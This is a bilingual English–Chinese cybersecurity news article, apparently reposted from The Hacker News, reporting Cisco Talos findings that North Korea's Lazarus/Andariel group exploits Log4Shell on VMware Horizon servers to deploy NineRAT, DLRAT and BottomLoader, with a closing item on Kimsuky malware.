Lazarus组织利用Log4j漏洞部署RAT

The notorious North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts.

众所周知，与朝鲜有关的恶意行为者—Lazarus Group—已被归因于一个新的全球攻击活动，其中包括对Log4j安全漏洞的机会性利用，以在被入侵的主机上部署先前未记录的远程访问木马（RAT）。

Cisco Talos is tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based malware families, including a RAT called NineRAT that leverages Telegram for command-and-control (C2), DLRAT, and a downloader dubbed BottomLoader.

思科Talos正在跟踪这项活动，该活动以Operation Blacksmith为名，指出了三个基于DLang的恶意软件家族的使用，包括一个名为NineRAT的RAT，它利用Telegram进行命令和控制（C2），DLRAT和一个名为BottomLoader的下载器。

The cybersecurity firm described the latest tactics of the adversary as a definitive shift and that they overlap with the cluster widely tracked as Andariel (aka Onyx Sleet or Silent Chollima), a sub-group within the Lazarus umbrella.

这家网络安全公司描述了对手最新的策略是一个明确的转变，并且与广泛跟踪的Andariel集团重叠（又名Onyx Sleet或Silent Chollima），这是Lazarus集团的一个子组。

"Andariel is typically tasked with initial access, reconnaissance and establishing long term access for espionage in support of the North Korean government's national interests," Talos researchers Jung soo An, Asheer Malhotra, and Vitor Ventura said in a technical report shared with The Hacker News.

"Andariel通常负责初始访问，侦察和建立长期访问权限，以支持朝鲜政府的国家利益。"Talos的研究人员Jung soo An，Asheer Malhotra和Vitor Ventura在与The Hacker News分享的技术报告中说道。

Attack chains involve the exploitation of CVE-2021-44228 (aka Log4Shell) against publicly-accessible VMWare Horizon servers to deliver NineRAT. Some of the prominent sectors targeted include manufacturing, agriculture, and physical security.

攻击链包括利用CVE-2021-44228（也称为Log4Shell）对公开可访问的VMWare Horizon服务器进行攻击，以传送NineRAT。一些明显受到攻击的部门包括制造业、农业和物理安保。

The abuse of Log4Shell is not surprising given the fact that 2.8 percent of applications are still using vulnerable versions of the library (from 2.0-beta9 through 2.15.0) after two years of public disclosure, according to Veracode, with another 3.8% using Log4j 2.17.0, which, while not vulnerable to CVE-2021-44228, is susceptible to CVE-2021-44832.

滥用Log4Shell并不奇怪，因为根据Veracode的数据，在两年的公开披露后，仍然有2.8%的应用程序在使用受漏洞影响的库的脆弱版本（从2.0-beta9到2.15.0），另有3.8%的应用程序使用Log4j 2.17.0，虽然不受CVE-2021-44228的影响，但容易受到CVE-2021-44832的影响。

NineRAT, first developed around May 2022, is said to have been put to use as early as March 2023 in an attack aimed at a South American agricultural organization, and then again in September 2023 on a European manufacturing entity. By using a legitimate messaging service like Telegram for C2 communications, the goal is to evade detection.

NineRAT首次开发于2022年5月左右，据说早在2023年3月就已在针对南美一家农业组织的攻击中开始使用，并在2023年9月再次用于欧洲一家制造业实体。通过使用像Telegram这样的合法消息传递服务来进行C2通信，目的是为了避免被侦测。

The malware acts as the primary means of interaction with the infected endpoint, enabling the attackers to send commands to gather system information, upload files of interest, download additional files, and even uninstall and upgrade itself.

该恶意软件充当与受感染的终端的主要互动手段，使攻击者能够发送命令来收集系统信息、上传感兴趣的文件、下载附加文件，甚至卸载和升级自身。

"Once NineRAT is activated it accepts preliminary commands from the telegram based C2 channel, to again fingerprint the infected systems," the researchers noted.

"一旦NineRAT被激活，它会接受来自Telegram的C2渠道的初步命令，再次对受感染的系统进行指纹识别。"研究人员指出。

"Re-fingerprinting of infected systems indicates that the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase."

受感染系统的重新指纹识别表明Lazarus通过NineRAT收集的数据可能由其他APT组织共享，并且基本上存放在与Lazarus在进行初始访问和植入部署阶段最初收集的指纹数据不同的数据仓库中。

Also used in the attacks after initial reconnaissance is a custom proxy tool called HazyLoad that was previously identified by Microsoft as used by the threat actor as part of intrusions weaponizing critical security flaws in JetBrains TeamCity (CVE-2023-42793, CVSS score: 9.8). HazyLoad is downloaded and executed by means of another malware called BottomLoader.

在初步侦察之后用于攻击的还有一种名为HazyLoad的自定义代理工具，微软此前已经确认了它作为一种武器化JetBrains TeamCity（CVE-2023-42793，CVSS评分：9.8）的重要安全漏洞的一部分，并且它是通过另一种称为BottomLoader的恶意软件下载和执行的。

Furthermore, Operation Blacksmith has been observed delivering DLRAT, which is both a downloader and a RAT equipped to perform system reconnaissance, deploy additional malware, and retrieve commands from the C2 and execute them in the compromised systems.

此外，Operation Blacksmith也被观察到传送DLRAT，这是一种既是下载器又是RAT的恶意软件，能够执行系统侦察，部署其他恶意软件，并从C2中检索命令并在受损系统中执行。

"The multiple tools giving overlapping backdoor entry present Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access," the researchers said.

"多种工具提供重复的后门入口，使Lazarus Group在发现工具时能够保持高度持久的访问权"，研究人员说。

The exploitation of Log4Shell by Andariel is not new, for the hacking crew has used the vulnerability as an initial access vector in the past to deliver a remote access trojan referred to as EarlyRat.

Andariel对Log4Shell的利用并不新鲜，因为该黑客组织在过去曾经利用这个漏洞作为初始访问矢量，以传送一种被称为EarlyRat的远程访问木马。

The disclosure comes as the AhnLab Security Emergency Response Center (ASEC) detailed Kimsuky's use of AutoIt versions of malware such as Amadey and RftRAT and distributing them via spear-phishing attacks bearing booby-trapped attachments and links in an attempt to bypass security products.

就在安全应急响应中心(AhnLab Security Emergency Response Center，ASEC)详细介绍了Kimsuky使用AutoIt版本的恶意软件（如Amadey和RftRAT）并通过矛头钓鱼攻击来传播它们的行为，以试图规避安全产品的攻击之际。

Kimusky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is an element operating under North Korea's Reconnaissance General Bureau (RGB), which also houses the Lazarus Group.

Kimusky（又称为APT43，ARCHIPELAGO，Black Banshee，Emerald Sleet（之前称为Thallium），Nickel Kimball和Velvet Chollima）是隶属于朝鲜侦察总局（RGB）下属的一个部分，该总局也是Lazarus Group所在地。

It was sanctioned by the U.S. Treasury Department on November 30, 2023, for gathering intelligence to support the regime's strategic objectives.

它在2023年11月30日被美国财政部制裁，因为它搜集情报以支持该政权的战略目标。

"After taking control of the infected system, to exfiltrate information, the Kimsuky group installs various malware such as keyloggers and tools for extracting accounts and cookies from web browsers," ASEC said in an analysis published last week.

"在接管受感染系统后，为了窃取信息，Kimsuky团伙安装了各种恶意软件，比如键盘记录器和用于从Web浏览器中提取账户和Cookie的工具。"ASEC在最近发表的分析中说。

原文始发于微信公众号（知机安全）：Lazarus组织利用Log4j漏洞部署RAT